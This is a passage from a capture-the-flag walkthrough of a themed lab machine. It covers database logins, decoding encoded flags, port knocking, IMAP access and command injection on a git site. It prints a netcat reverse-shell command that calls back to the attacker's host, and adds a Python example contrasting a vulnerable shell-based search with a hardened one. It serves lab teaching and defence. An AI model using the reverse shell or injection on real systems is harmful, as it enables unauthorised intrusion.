We log in with the username and password we found in the TXT records.
We use the search provided by the site to check for vulnerabilities.
We use the file manager module, which opens a file manager that lets us access a few files.
In the /home/aryastark folder we find a file called flag.txt.
We download the file, open it on our system and find our 4th flag.
Now we have a hint to access a database. We know the server is running PostgreSQL, so we connect to it using the username and password available in the file we found earlier.
psql -h 192.168.1.133 -U robinarryn -d mountainandthevale
We find a table called flag; we open it and find a base64-encoded string.
We decode the base64-encoded string and find our 5th flag.
Now we check the other tables to see if we missed anything.
In one of the tables we find a few names.
SELECT * FROM arya_kill_list;
In arya_kill_list we find these names, which seem useful.
Searching through the database we find a rot16-encoded string.
We now convert the rot16-encoded flag and find the name of a database along with the password. It also gives us a hint to use the username we found in the table above.
After enumerating the usernames we find that TheRedWomanMelisandre is the username.
Now we check the table and find a secret flag.
Now we know the kingdom of Reach is in IMAP, as it was shown in the map, so we use the numbers we found earlier to port knock.
knock 192.168.1.133 3487 64535 12345
Now we run an nmap scan to check whether any new port has opened on the server; we find that port 143, which is running IMAP, has opened.
We use netcat to connect to it with the username and password we found in the hint earlier.
In the inbox we find our 6th flag. We also get a hint to use port 1337, and a username and password are given to log in.
We log in to the site and find that it is a git site.
After enumerating through the files we find that this site is vulnerable to command injection, along with a hint to use MySQL.
We use netcat to get a reverse shell on the site; we use “”`code` to execute our code.
nc -e /bin/bash 192.168.1.116 1234
Now we set up our listener using netcat; as soon as we execute our command we get a reverse shell.
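Why backticks are enough for this kind of command injection, seen from the application side and next to the fix. This is an added example, not code from the target site or from this walkthrough: the handler names, the grep-based search and the sample file are assumptions, and the constructed input only creates a marker file.

```python
import os
import subprocess
import tempfile


def search_vulnerable(term: str, path: str) -> str:
    """Hypothetical search handler that builds a shell string from user input."""
    # Double quotes do not protect the term: the shell still expands
    # `...` and $(...) inside them before grep ever runs.
    cmd = f'grep -c -- "{term}" "{path}"'
    done = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return done.stdout.strip()


def search_hardened(term: str, path: str) -> str:
    """Same search with no shell: the term is one literal argv element."""
    argv = ["grep", "-c", "-F", "--", term, path]
    done = subprocess.run(argv, capture_output=True, text=True)
    return done.stdout.strip()


def demo() -> dict:
    """Run both handlers on a constructed, harmless backtick input."""
    with tempfile.TemporaryDirectory() as tmp:
        repo_file = os.path.join(tmp, "README")
        with open(repo_file, "w") as fh:
            fh.write("winter is coming\n")  # constructed sample content

        results = {}
        for name, handler in (("vulnerable", search_vulnerable),
                              ("hardened", search_hardened)):
            marker = os.path.join(tmp, f"marker_{name}")
            # Constructed input: the embedded command only creates a file.
            term = f"`touch {marker}`"
            handler(term, repo_file)
            # True means the embedded command was executed by a shell.
            results[name] = os.path.exists(marker)
        return results


if __name__ == "__main__":
    print(demo())
```

The hardened handler never starts a shell, so the backticks reach grep as literal characters and the marker file is never created.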
On the webpage earlier we found a hex-encoded string; when we decode it we get the location of a file: /home/tyrionlannister/checkpoint.txt. We open it and find the username, password and name of the database we need to look for.
Now we use the information above to find the tables available in the database.